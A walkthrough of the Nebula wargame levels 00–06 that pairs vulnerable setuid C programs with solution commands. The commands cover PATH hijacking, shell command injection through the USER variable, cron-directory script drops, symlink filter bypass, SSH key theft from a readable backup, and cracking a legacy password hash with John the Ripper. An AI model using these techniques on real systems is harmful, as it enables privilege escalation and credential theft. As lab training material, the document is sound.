Nebula level00
About
This level requires you to find a Set User ID program that will run as the "flag00" account. You could also find this by carefully looking in top level directories in / for suspicious looking directories.
Alternatively, look at the find man page.
To access this level, log in as level00 with the password of level00 .
Source code
There is no source code available for this level
$ find / -user flag00 2> /dev/null
Nebula level01
About
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level01 account with the password level01 . Files for this level can be found in /home/flag01.
Source code
7int main(int argc, char argv, char envp)
8{
9 gid_t gid;
10 uid_t uid;
11 gid = getegid();
12 uid = geteuid();
14 setresgid(gid, gid, gid);
15 setresuid(uid, uid, uid);
17 system("/usr/bin/env echo and now what?");
18}
$ echo 'getflag' > /tmp/echo
$ chmod a+x /tmp/echo
$ export PATH='/tmp:'$PATH
$ /home/flag01/flag01
Nebula level02
About
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level02 account with the password level02 . Files for this level can be found in /home/flag02.
Source code
7int main(int argc, char argv, char envp)
8{
9char *buffer;
11 gid_t gid;
12 uid_t uid;
14 gid = getegid();
15 uid = geteuid();
17 setresgid(gid, gid, gid);
18 setresuid(uid, uid, uid);
20 buffer = NULL;
22 asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
23 printf("about to call system("%s")\n", buffer);
25 system(buffer);
26}
$ export USER='getflag'
$ /home/flag02/flag02
$ export USER='&& getflag &&'
$ export USER=';getflag;'
Nebula level03
About
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03 . Files for this level can be found in /home/flag03.
Source code
There is no source code available for this level
$ echo 'getflag > /tmp/flag03' > /home/flag03/writable.d/
$ cat /tmp/flag03
Nebula level04
About
This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)
To do this level, log in as the level04 account with the password level04 . Files for this level can be found in /home/flag04.
Source code
8int main(int argc, char argv, char envp)
9{
10char buf[1024];
11int fd, rc;
13if(argc == 1) {
14 printf("%s [file to read]\n", argv[0]);
15 exit(EXIT_FAILURE);
16 }
18if(strstr(argv[1], "token") != NULL) {
19 printf("You may not access '%s'\n", argv[1]);
20 exit(EXIT_FAILURE);
21 }
23 fd = open(argv[1], O_RDONLY);
24if(fd == -1) {
25 err(EXIT_FAILURE, "Unable to open %s", argv[1]);
26 }
28 rc = read(fd, buf, sizeof(buf));
30if(rc == -1) {
31 err(EXIT_FAILURE, "Unable to read fd %d", fd);
32 }
34 write(1, buf, rc);
35}
$ ln -s /home/flag04/token /tmp/flag04
$ /home/flag04/flag04 /tmp/flag04
Nebula level05
About
Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05 . Files for this level can be found in /home/flag05.
Source code
There is no source code available for this level
$ cp /home/flag05/.backup/backup-*.tgz /tmp/backup.tgz
$ gunzip backup.tgz
$ tar -xvf backup.tar
$ cp /tmp/.ssh/* /home/level05/.ssh/
$ ssh flag05@127.0.0.1
Nebula level06
About
The flag06 account credentials came from a legacy unix system.
To do this level, log in as the level06 account with the password level06 . Files for this level can be found in /home/flag06.
Source code
There is no source code available for this level
$ cat /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
root@bt:/pentest/passwords/john# echo ' ueqwOCnSGdsuM' > pass.txt
root@bt:/pentest/passwords/john# ./john pass.txt
Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
hello (?)
guesses: 1 time: 0:00:00:00 DONE (Mon Jun 10 00:57:27 2013) c/s: 1828 trying: 123456 - marley
Use the "--show" option to display all of the cracked passwords reliably
root@bt:/pentest/passwords/john# ./john pass.txt --show
?:hello
1 password hash cracked, 0 left
